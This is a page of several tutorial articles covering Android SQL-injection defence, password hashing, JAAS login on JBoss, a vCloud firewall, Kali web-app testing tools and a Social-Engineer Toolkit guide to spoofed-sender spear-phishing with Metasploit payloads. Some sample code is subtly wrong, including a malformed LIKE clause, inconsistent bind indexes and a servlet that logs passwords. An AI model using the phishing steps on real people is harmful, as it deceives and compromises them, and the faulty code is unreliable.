means different things to each of the application component types. This is because of the various inter-process communications ( IPC ) mechanisms that can be used to interact with them. For every application component, the android:permission attribute does the following: Activity : Limits the application components which are external to your application that can successfully call startActivity or startActivityForResult to those with the required permission Service : Limits the external application components that can bind (by calling bindService()) or start (by calling startService()) the service to those with the specified permission Receiver : Limits the number of external application components that can send broadcasted intents to the receiver with the specified permission Provider : Limits access to data that is made accessible via the content provider The android:permission attribute of each of the component XML elements overrides the <application> element's android:permission attribute. This means that if you haven't specified any required permissions for your components and have specified one in the <application> element, it will apply to all of the components contained in it. Though specifying permissions via the <application> element is not something developers do too often because of how it affects the friendliness of the components toward the Android system itself (that is, if you override an activity's required permissions using the <application> element), the home launcher will not be able to start your activity. That being said, if you are paranoid enough and don't need any unauthorized interaction to happen with your application or its components, you should make use of the android:permission attribute of the <application> tag. When you define an <intent-filter> element on a component, it will automatically be exported unless you explicitly set exported="false". However, this seemed to be a lesser-known fact, as many developers were inadvertently opening their content providers to other applications. So, Google responded by changing the default behavior for <provider> in Android 4.2. If you set either android:minSdkVersion or android:targetSdkVersion to 17, the exported attribute on <provider> will default to false. Defending against the SQL-injection attack The previous chapter covered some of the common attacks against content providers, one of them being the infamous SQL-injection attack. This attack leverages the fact that adversaries are capable of supplying SQL statements or SQL-related syntax as part of their selection arguments, projections, or any component of a valid SQL statement. This allows them to extract more information from a content provider than they are not authorized. The best way to make sure adversaries will not be able to inject unsolicited SQL syntax into your queries is to avoid using SQLiteDatabase.rawQuery() instead opting for a parameterized statement. Using a compiled statement, such as SQLiteStatement, offers both binding and escaping of arguments to defend against SQL-injection attacks. Also, there is a performance benefit due to the fact the database does not need to parse the statement for each execution. An alternative to SQLiteStatement is to use the query, insert, update, and delete methods on SQLiteDatabase as they offer parameterized statements via their use of string arrays. When we describe parameterized statement, we are describing an SQL statement with a question mark where values will be inserted or binded. Here's an example of parameterized SQL insert statement: INSERT VALUES INTO [table name] (?,?,?,?,...) Here [table name] would be the name of the relevant table in which values have to be inserted. How to do it... For this example, we are using a simple Data Access Object ( DAO ) pattern, where all of the database operations for RSS items are contained within the RssItemDAO class: When we instantiate RssItemDAO, we compile the insertStatement object with a parameterized SQL insert statement string. This needs to be done only once and can be re-used for multiple inserts: public class RssItemDAO { private SQLiteDatabase db; private SQLiteStatement insertStatement; private static String COL_TITLE = "title"; private static String TABLE_NAME = "RSS_ITEMS"; private static String INSERT_SQL = "insert into " + TABLE_NAME + " (content, link, title) values (?,?,?)"; public RssItemDAO(SQLiteDatabase db) { this.db = db; insertStatement = db.compileStatement(INSERT_SQL); } The order of the columns noted in the INSERT_SQL variable is important, as it directly maps to the index when binding values. In the preceding example, content maps to index 0, link maps to index 1, and title to index 2. Now, when we come to insert a new RssItem object to the database, we bind each of the properties in the order they appear in the statement: public long save(RssItem item) { insertStatement.bindString(1, item.getContent()); insertStatement.bindString(2, item.getLink()); insertStatement.bindString(3, item.getTitle()); return insertStatement.executeInsert(); } Notice that we call executeInsert, a helper method that returns the ID of the newly created row. It's as simple as that to use a SQLiteStatement statement. This shows how to use SQLiteDatabase.query to fetch RssItems that match a given search term: public List<RssItem> fetchRssItemsByTitle(String searchTerm) { Cursor cursor = db.query(TABLE_NAME, null, COL_TITLE + "LIKE ?", new String[] { "%" + searchTerm + "%" }, null, null, null); // process cursor into list List<RssItem> rssItems = new ArrayList<RssItemDAO.RssItem>(); cursor.moveToFirst(); while (!cursor.isAfterLast()) { // maps cursor columns of RssItem properties RssItem item = cursorToRssItem(cursor); rssItems.add(item); cursor.moveToNext(); } return rssItems; } We use LIKE and the SQL wildcard syntax to match any part of the text with a title column. Summary There were a lot of technical details in this article. Firstly, we learned about the components that are vulnerable to SQL-injection attacks. We then figured out how to secure our Android applications from the exploitation attacks. Finally, we learned how to defend our applications from the SQL-injection attacks. Resources for Article: Further resources on this subject: Android Native Application API [Article] So, what is Spring for Android? [Article] Creating Dynamic UI with Android Fragments [Article]
Read more
  • 0
  • 0
  • 12391

article-image-rounding
Packt
25 Nov 2013
3 min read
Save for later

Rounding up...

Packt
25 Nov 2013
3 min read
(For more resources related to this topic, see here.) We have now successfully learned how to secure our users' passwords using hashes; however, we should take a look at the big picture, just in case. The following figure shows what a very basic web application looks like: Note the https transmission tag: HTTPS is a secure transfer protocol, which allows us to transport information in a secure way. When we transport sensitive data such as passwords in a Web Application, anyone who intercepts the connection can easily get the password in plain text, and our users' data would be compromised. In order to avoid this, we should always use HTTPS when there's sensitive data involved. HTTPS is fairly easy to setup, you just need to buy an SSL certificate and configure it with your hosting provider. Configuration varies depending on the provider, but usually they provide an easy way to do it. It is strongly suggested to use HTTPS for authentication, sign up, sign in, and other sensitive data processes. As a general rule, most (if not all) of the data exchange that requires the user to be logged in should be protected. Keep in mind that HTTPS comes at a cost, so try to avoid using HTTPS on static pages that have public information. Always keep in mind that to protect the password, we need ensure secure transport (with HTTPS) and secure storage (with strong hashes) as well. Both are critical phases and we need to be very careful with them. Now that our passwords and other sensitive data are being transferred in a secure way, we can get into the application workflow. Consider the following steps for an authentication process: The application receives an Authentication Request. The Web Layer takes care of it as it gets the parameters (username and password), and passes them to the Authentication Service. The Authentication Service calls the Database Access Layer to retrieve the user from the database. The Database Access Layer queries the database, gets the user, and returns it to the Authentication Service. The Authentication Service gets the stored hash from the users' data retrieved from the database, extracts the salt and the amount of iterations, and calls the Hashing Utility passing the password from the authentication request, the salt, and the iterations. The Hashing Utility generates the hash and returns it to the Authentication Service. The Authentication Service performs a constant-time comparison between the stored hash and the generated hash, and we inform the Web Layer if the user is authenticated or not. The Web Layer returns the corresponding view to the user depending on whether they are authenticated or not. The following figure can help us understand how this works, please consider that flows 1, 2, 3, and 4 are bidirectional: The Authentication Service and the Hashing Utility components are the ones we have been working with so far. We already know how to create hashes, this workflow is an example to understand when we should it. Summary In this article we learned how to create hashes and have now successfully learned how to secure our users' passwords using hashes. We have also learned that we need to ensure secure transport (with HTTPS) and secure storage (with strong hashes) as well. Resources for Article: Further resources on this subject: FreeRADIUS Authentication: Storing Passwords [Article] EJB 3.1: Controlling Security Programmatically Using JAAS [Article] So, what is Spring for Android? [Article]
Read more
  • 0
  • 0
  • 1249
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-jaas-based-security-authentication-jsps
Packt
18 Nov 2013
9 min read
Save for later

JAAS-based security authentication on JSPs

Packt
18 Nov 2013
9 min read
(For more resources related to this topic, see here.) The deployment descriptor is the main configuration file of all the web applications. The container first looks out for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd. The following is the schema element available in the XSD: <xsd:element name="security-constraint" type="j2ee:securityconstraintType"/> <xsd:element name="login-config" type="j2ee:login-configType"/> <xsd:element name="security-role "type="j2ee:security-roleType"/> Getting ready You will need the following to demonstrate authentication and authorization: JBoss 7 Eclipse Indigo 3.7 Create a dynamic web project and name it Security Demo Create a package, com.servlets Create an XML file in the WebContent folder, jboss-web.xml Create two JSP pages, login.jsp and logoff.jsp How to do it... Perform the following steps to achieve JAAS-based security for JSPs: Edit the login.jsp file with the input fields j_username, j_password, and submit it to SecurityCheckerServlet: <%@ page contentType="text/html; charset=UTF-8" %> <%@ page language="java" %> <html > <HEAD> <TITLE>PACKT Login Form</TITLE> <SCRIPT> function submitForm() { var frm = document. myform; if( frm.j_username.value == "" ) { alert("please enter your username, its empty"); frm.j_username.focus(); return ; } if( frm.j_password.value == "" ) { alert("please enter the password,its empty"); frm.j_password.focus(); return ; } frm.submit(); } </SCRIPT> </HEAD> <BODY> <FORM name="myform" action="SecurityCheckerServlet" METHOD=get> <TABLE width="100%" border="0" cellspacing="0" cellpadding= "1" bgcolor="white"> <TABLE width="100%" border="0" cellspacing= "0" cellpadding="5"> <TR align="center"> <TD align="right" class="Prompt"></TD> <TD align="left"> <INPUT type="text" name="j_username" maxlength=20> </TD> </TR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <INPUT type="password" name="j_password" maxlength=20 > <BR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <input type="submit" onclick="javascript:submitForm();" value="Login"> </TD> </TR> </TABLE> </FORM> </BODY> </html> The j_username and j_password are the indicators of using form-based authentication. Let's modify the web.xml file to protect all the files that end with .jsp. If you are trying to access any JSP file, you would be given a login form, which in turn calls a SecurityCheckerServlet file to authenticate the user. You can also see role information is displayed. Update the web.xml file as shown in the following code snippet. We have used 2.5 xsd. The following code needs to be placed in between the webapp tag in the web.xml file: <display-name>jaas-jboss</display-name> <welcome-file-list> <welcome-file>index.html</welcome-file> <welcome-file>index.htm</welcome-file> <welcome-file>index.jsp</welcome-file> <welcome-file>default.html</welcome-file> <welcome-file>default.htm</welcome-file> <welcome-file>default.jsp</welcome-file> </welcome-file-list> <security-constraint> <web-resource-collection> <web-resource-name>something</web-resource-name> <description>Declarative security tests</description> <url-pattern>*.jsp</url-pattern> <http-method>HEAD</http-method> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>role1</role-name> </auth-constraint> <user-data-constraint> <description>no description</description> <transport-guarantee>NONE</transport-guarantee> </user-data-constraint> </security-constraint> <login-config> <auth-method>FORM</auth-method> <form-login-config> <form-login-page>/login.jsp</form-login-page> <form-error-page>/logoff.jsp</form-error-page> </form-login-config> </login-config> <security-role> <description>some role</description> <role-name>role1</role-name> </security-role> <security-role> <description>packt managers</description> <role-name>manager</role-name> </security-role> <servlet> <description></description> <display-name>SecurityCheckerServlet</display-name> <servlet-name>SecurityCheckerServlet</servlet-name> <servlet-class>com.servlets.SecurityCheckerServlet </servlet-class> </servlet> <servlet-mapping> <servlet-name>SecurityCheckerServlet</servlet-name> <url-pattern>/SecurityCheckerServlet</url-pattern> </servlet-mapping> JAAS Security Checker and Credential Handler: Servlet is a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandle and add all the necessary imports. In the following SecurityCheckerServlet, we are getting the input from the JSP file and passing it to the CallbackHandler. We are then passing the Handler object to the LoginContext class which has the login() method to do the authentication. On successful authentication, it will create Subject and Principal for the user, with user details. We are using iterator interface to iterate the LoginContext object to get the user details retrieved for authentication. In the SecurityCheckerServlet Class: package com.servlets; public class SecurityCheckerServlet extends HttpServlet { private static final long serialVersionUID = 1L; public SecurityCheckerServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { char[] password = null; PrintWriter out=response.getWriter(); try { SecurityAssociationHandler handler = new SecurityAssociationHandler(); SimplePrincipal user = new SimplePrincipal(request.getParameter ("j_username")); password=request.getParameter("j_password"). toCharArray(); handler.setSecurityInfo(user, password); System.out.println("password"+password); CallbackHandler myHandler = new UserCredentialHandler(request.getParameter ("j_username"),request.getParameter ("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login(); Subject subject = lc.getSubject(); Set principals = subject.getPrincipals(); List l=new ArrayList(); Iterator it = lc.getSubject().getPrincipals(). iterator(); while (it.hasNext()) { System.out.println("Authenticated: " + it.next().toString() + "<br>"); out.println("<b><html><body><font color='green'>Authenticated: " + request.getParameter("j_username")+" <br/>"+it.next().toString() + "<br/></font></b></body></html>"); } it = lc.getSubject().getPublicCredentials (Properties.class).iterator(); while (it.hasNext()) System.out.println(it.next().toString()); lc.logout(); } catch (Exception e) { out.println("<b><font color='red'>failed authenticatation.</font>-</b>"+e); } } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } } Create the UserCredentialHandler file: package com.servlets; class UserCredentialHandler implements CallbackHandler { private String user, pass; UserCredentialHandler(String user, String pass) { super(); this.user = user; this.pass = pass; } @Override public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException { for (int i = 0; i < callbacks.length; i++) { if (callbacks[i] instanceof NameCallback) { NameCallback nc = (NameCallback) callbacks[i]; nc.setName(user); } else if (callbacks[i] instanceof PasswordCallback) { PasswordCallback pc = (PasswordCallback) callbacks[i]; pc.setPassword(pass.toCharArray()); } else { throw new UnsupportedCallbackException (callbacks[i], "Unrecognized Callback"); } } } } In the jboss-web.xml file: <?xml version="1.0" encoding="UTF-8"?> <jboss-web> <security-domain>java:/jaas/other</security-domain> </jboss-web> Other is the name of the application policy defined in the login-config.xml file. All these will be packed in as a .war file. Configuring the JBoss Application Server. Go to jboss-5.1.0.GAserver defaultconflogin-config.xml in JBoss. If you look at the file, you can see various configurations for database LDAP and a simple one using the properties file, which I have used in the following code snippet: <application-policy name="other"> <!-- A simple server login module, which can be used when the number of users is relatively small. It uses two properties files: users.properties, which holds users (key) and their password (value). roles.properties, which holds users (key) and a commaseparated list of their roles (value). The unauthenticatedIdentity property defines the name of the principal that will be used when a null username and password are presented as is the case for an unauthenticated web client or MDB. If you want to allow such users to be authenticated add the property, e.g., unauthenticatedIdentity="nobody" --> <authentication> <login-module code="org.jboss.security.auth.spi.UsersRoles LoginModule" flag="required"/> <module-option name="usersProperties"> users.properties</module-option> <module-option name="rolesProperties"> roles.properties</module-option> <module-option name="unauthenticatedIdentity"> nobody</module-option> </authentication> </application-policy> Create the users.properties file in the same folder. The following is the Users. properties file with username mapped with role. User.properties anjana=anjana123 roles.properties anjana=role1 Restart the server. How it works... JAAS consists of a set of interfaces to handle the authentication process. They are: The CallbackHandler and Callback interfaces The LoginModule interface LoginContext The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container specific. Each container will have its own implementation, here we are using JBoss application server to demonstrate JAAS. In my previous example, I have explicitly called JASS interfaces. UserCredentialHandler implements the CallbackHandler interfaces. So, CallbackHandlers are storage spaces for the user credentials and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to LoginModule interfaces for authentication: CallbackHandler myHandler = new UserCredentialHandler(request. getParameter("j_username"),request.getParameter("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login() The web.xml file defines the security mechanisms and also points us to the protected resources in our application. The following screenshot shows a failed authentication window: The following screenshot shows a successful authentication window: Summary We introduced the JAAs-based mechanism of applying security to authenticate and authorize the users to the application Resources for Article: Further resources on this subject: Spring Security 3: Tips and Tricks [Article] Spring Security: Configuring Secure Passwords [Article] Migration to Spring Security 3 [Article]
Read more
  • 0
  • 0
  • 2727

article-image-securing-vcloud-using-vcloud-networking-and-security-app-firewall
Packt
12 Nov 2013
6 min read
Save for later

Securing vCloud Using the vCloud Networking and Security App Firewall

Packt
12 Nov 2013
6 min read
(For more resources related to this topic, see here.) Creating a vCloud Networking and Security App firewall rule In this article, we will create a VMware vCloud Networking and Security App firewall rule that restricts inbound HTTP traffic destined for a web server: Open the vCloud Networking and Security Manager URL in a supported browser, or it can also be accessed from the vCenter client. Log in to vCloud Networking and Security as admin. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter. In the right-hand pane, click on the App Firewall tab. Click on the Networks link. On the General tab, click on the + link. Point to the new rule Name cell and click on the + icon. In the rule Name panel, type Deny HTTP in the textbox and click on OK. Point to the Destination cell and click on the + icon. In the input panel, perform the following actions: Go to IP Addresses from the drop-down menu. At the bottom of the panel, click on the New IP Addresses link. In the Add IP Addresses panel, configure an address set that includes the web server. Click on OK. Point to the Service cell and click on the + icon. In the input panel, perform the following actions: Sort the Available list by name. Scroll down and go to the HTTP service checkbox. Click on the blue right-arrow to move the HTTP service from the Available list to the Selected list. Click on OK. Go to the Action cell and click on the + icon. In the input panel, click on Block and Log. Click on OK. Click on the Publish Changes button, located above the rules list, on the green bar. In general, create firewall rules that meet your business needs. In addition, you might consider the following guidelines: Where possible, when identifying the source and destination, take advantage of vSphere groupings in your vCenter Server inventory, such as the datacenter, cluster, and vApp. By writing rules in terms of these groupings, the number of firewall rules is reduced, which makes the rules easier to track and less prone to configuration errors. If a vSphere grouping does not suit your needs because you need to create a more specialized group, take advantage of security groups. Like vSphere groupings, security groups reduce the number of rules that you need to create, making the rules easier to track and maintain. Finally, set the action on the default firewall rules based on your business policy. For example, as a security best practice, you might deny all traffic by default. If all traffic is denied, vCloud Networking and Security App drops all incoming and outgoing traffic. Allowing all traffic by default makes your datacenter very accessible, but also insecure. vCloud Networking and Security App – flow monitoring Flow monitoring is a traffic analysis tool that provides a detailed view of the traffic on your virtual network and that passed through a vCloud Networking and Security App. The flow monitoring output defines which machines are exchanging data and over which application. This data includes the number of sessions, packets, and bytes transmitted per session. Session details include sources, destinations, direction of sessions, applications, and ports used. Session details can be used to create firewall rules to allow or block traffic. You can use flow monitoring as a forensic tool to detect rogue services and examine outbound sessions. The main advantages of flow monitoring are: You can easily analyze inter-VM traffic Dynamic rules can be created right from the flow monitoring console You can use it for debugging network related problems as you can enable logging for every individual virtual machine on an as-needed basis You can view traffic sessions inspected by a vCloud Networking and Security App within the specified time span. The last 24 hours of data are displayed by default; the minimum time span is 1 hour, and the maximum is 2 weeks. The bar at the top of the page shows the percentage of allowed traffic in green and blocked traffic in red. Examining flow monitoring statistics Let us examine the statistics for the Top Flows, Top Destinations, and Top Sources categories. Open the vCloud Networking and Security Manager URL in a supported browser. Log in to vCloud Networking and Security as admin. In the vCloud Networking and Security Manager inventory pane, go to Datacenters | Your Datacenter. In the right-hand pane, click on the Network Virtualization link. Click on the Networks link. In the networks list, click on the network where you want to monitor the flow. Click on the Flow Monitoring button. Verify that Flow Monitoring | Summary is selected. On the far right side of the page, across from the Summary and Details links, click on the Time Interval Change link. On the Time Interval panel, select the Last 1 week radio button and click on Update. Verify that the Top Flows button is selected. Use the Top Flows table to determine which flow has the highest volume of bytes and which flow has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph. Point to the apex of three different colored lines and determine which network protocol is reported. Scroll to the top of the form and click on the Top Destinations button. Use the Top Destinations table to determine which destination has the highest volume of incoming bytes and which destination has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph. Scroll to the top of the form and click on the Top Sources button. Use the Top Sources table to determine which source has the highest volume of bytes and which source has the highest volume of packets. Use the mouse wheel or the vertical scroll bar to view the graph. Summary In this article we learned how to create access control policies based on logical constructs such as VMware vCenter Server containers and VMware vCloud Networking and Security Security Groups, but not just physical constructs such as IP addresses. Resources for Article: Further resources on this subject: Windows 8 with VMware View [Article] VMware View 5 Desktop Virtualization [Article] Cloning and Snapshots in VMware Workstation [Article]
Read more
  • 0
  • 0
  • 1529

article-image-web-app-penetration-testing-kali
Packt
30 Oct 2013
4 min read
Save for later

Web app penetration testing in Kali

Packt
30 Oct 2013
4 min read
(For more resources related to this topic, see here.) Web apps are now a major part of today's World Wide Web. Keeping them safe and secure is the prime focus of webmasters. Building web apps from scratch can be a tedious task, and there can be small bugs in the code that can lead to a security breach. This is where web apps jump in and help you secure your application. Web app penetration testing can be implemented at various fronts such as the frontend interface, database, and web server. Let us leverage the power of some of the important tools of Kali that can be helpful during web app penetration testing. WebScarab proxy WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review and modify the requests created by the browser before they are sent to the server. Similarly, the responses received from the server can be modified before they are reflected in the browser. The new version of WebScarab has many more advanced features such as XSS/CSRF detection, Session ID analysis, and Fuzzing. Follow these three steps to get started with WebScarab: To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web application proxies | WebScarab. Once the application is loaded, you will have to change your browser's network settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008: Save the settings and go back to the WebScarab GUI. Click on the Proxy tab and check Intercept request. Make sure that both GET and POST requests are highlighted on the left-hand side panel. To intercept the response, check Intercept responses to begin reviewing the responses coming from the server. Attacking the database using sqlninja sqlninja is a popular tool used to test SQL injection vulnerabilities in Microsoft SQL servers. Databases are an integral part of web apps hence, even a single flaw in it can lead to mass compromising of information. Let us see how sqlninja can be used for database penetration testing. To launch SQL ninja, browse to Applications | Kali Linux | Web applications | Database Exploitation | sqlninja. This will launch the terminal window with sqlninja parameters. The important parameter to look for is either the mode parameter or the –m parameter: The –m parameter specifies the type of operation we want to perform over the target database.Let us pass a basic command and analyze the output: root@kali:~#sqlninja –m test Sqlninja rel. 0.2.3-r1 Copyright (C) 2006-2008 icesurfer [-] sqlninja.conf does not exist. You want to create it now ? [y/n] This will prompt you to set up your configuration file (sqlninja.conf). You can pass the respective values and create the config file. Once you are through with it, you are ready to perform database penetration testing. The Websploit framework Websploit is an open source framework designed for vulnerability analysis and penetration testing of web applications. It is very much similar to Metasploit and incorporates many of its plugins to add functionalities. To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application Fuzzers | Websploit. We can begin by updating the framework. Passing the update command at the terminal will begin the updating process as follows: wsf>update [*]Updating Websploit framework, Please Wait… Once the update is over, you can check out the available modules by passing the following command: wsf>show modules Let us launch a simple directory scanner module against www.target.com as follows: wsf>use web/dir_scanner wsf:Dir_Scanner>show options wsf:Dir_Scanner>set TARGET www.target.com wsf:Dir_Scanner>run Once the run command is executed, Websploit will launch the attack module and display the result. Similarly, we can use other modules based on the requirements of our scenarios. Summary In this article, we covered the following sections: WebScarab proxy Attacking the database using sqlninja The Websploit framework Resources for Article: Further resources on this subject: Installing VirtualBox on Linux [Article] Linux Shell Script: Tips and Tricks [Article] Installing Arch Linux using the official ISO [Article]
Read more
  • 0
  • 0
  • 5760

article-image-social-engineer-toolkit
Packt
25 Oct 2013
11 min read
Save for later

Social-Engineer Toolkit

Packt
25 Oct 2013
11 min read
(For more resources related to this topic, see here.) Social engineering is an act of manipulating people to perform actions that they don't intend to do. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or some malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing unintentional malicious activity. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario where the victim can be tricked to reveal his/her login information by sending a fake login/phishing page. The Social-Engineer Toolkit is designed to perform such tricking activities. Just like we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze the aspect of this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering. Getting started with the Social-Engineer Toolkit (SET) Let's start our introductory recipe about SET, where we will be discussing SET on different platforms. Getting ready SET can be downloaded for different platforms from its official website: https://www.trustedsec.com/. It has both the GUI version, which runs through the browser, and the command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article. How to do it... To launch SET on BackTrack, start the terminal window and pass the following path: root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set Copyright 2012, The Social-Engineer Toolkit (SET) All rights reserved. Select from the menu: If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use. The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit. How it works... SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools, such as SET. It also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET. Apache is typically considered the preferable server while working with SET. There's more... Sometimes, you may have an issue upgrading to the new release of SET in BackTrack 5 R3. Try out the following steps: You should remove the old SET using the following command: dpkg –r set We can remove SET in two ways. First, we can trace the path to /pentest/exploits/set, making sure we are in the directory and then opt for the 'rm' command for removing all files present there. Or, we can use the method shown previously. Then, for reinstallation, we can download its clone using the following command: Git clone https://github.com/trustedsec/social-engineer-toolkit /set Working with the SET config file In this recipe, we will take a close look at the SET config file, which contains default values for different parameters that are used by the toolkit. The default configuration works fine with most of the attacks, but there can be situations when you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file. Getting ready To launch the config file, move to the config file and open the set_config file: root@bt:/pentest/exploits/set# nano config/set_config The configuration file will be launched with some introductory statements, as shown in the following screenshot: How to do it... Let's go through it step-by-step: First, we will see what configuration settings are available for us: # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3 METASPLOIT_PATH=/pentest/exploits/framework3 The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as it picks up payloads and exploits from the framework: # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT # EXAMPLE: ETTERCAP_INTERFACE=wlan0 ETTERCAP_INTERFACE=eth0 # # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF) ETTERCAP_PATH=/usr/share/ettercap Ettercap is a multipurpose sniffer for switched LAN. Ettercap section can be used to perform LAN attacks like DNS poisoning, spoofing etc. The above SET setting can be used to either set ettercap ON of OFF depending upon the usability. # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES SENDMAIL=OFF The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF. The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack: # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO # INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk SELF_SIGNED_APPLET=OFF We will discuss this attack vector in detail in a later recipe, that is, the Spear phishing attack vector . This attack vector will also require JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail: SELF_SIGNED_APPLET=ON # AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT # SET TO AUTODETECT YOUR INTERFACE AUTO_DETECT=ON The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using NAT/Port forwarding, and it allows you to connect to the external Internet. The following setting is used to set up the Apache web server to perform web-based attack vectors. It is always preferred to set it to ON for better attack performance: # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF # THE ATTACK VECTOR APACHE_SERVER=OFF # # PATH TO THE APACHE WEBROOT APACHE_DIRECTORY=/var/www The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET. So, it is recommended to keep this flag OFF: # TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF The following setting can be used to build a self-signed certificate for web attacks, but there will be a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user: # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! # SELF_SIGNED_CERT=OFF The following setting is used to enable or disable the Metasploit listener once the attack is executed: # DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND. AUTOMATIC_LISTENER=ON The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase the penetration testing performance: # THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS # OR THE OTHER ATTACK VECTORS. METASPLOIT_MODE=ON These are a few important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over the SET. How it works... The SET config file is the heart of the toolkit, as it contains the default values that SET will pick while performing various attack vectors. A misconfigured SET file can lead to errors during the operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file. Working with the spear-phishing attack vector A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to target/specific user(s). In order to spoof your own e-mail address, you will require a sendmail server. Change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, then it can be downloaded by entering the following command: root@bt:~# apt-get install sendmail Reading package lists... Done Getting ready Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works. Recipient e-mail servers, in order to mitigate these types of attacks, deploy gray-listing, SPF records validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain. For example, if a spoofed e-mail address, <[email protected]>, arrives from the IP 202.145.34.23, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in the RBL/SURL list. As the spear-phishing attack relies heavily on user perception, the attacker should conduct a recon of the content that is being sent and should ensure that the content looks as legitimate as possible. Spear-phishing attacks are of two types—web-based content and payload-based content. How to do it... The spear-phishing module has three different attack vectors at our disposal: Let's analyze each of them. Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options will include setting the vnc server or executing the payload and starting the command line, and so on. The next few steps will be starting the sendmail server, setting a template for a malicious file format, and selecting a single or mass-mail attack: Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server: 1. Use a gmail Account for your email attack. 2. Use your own server or open relay set:phishing>1 set:phishing> From address (ex: [email protected]):[email protected] set:phishing> Flag this message/s as high priority? 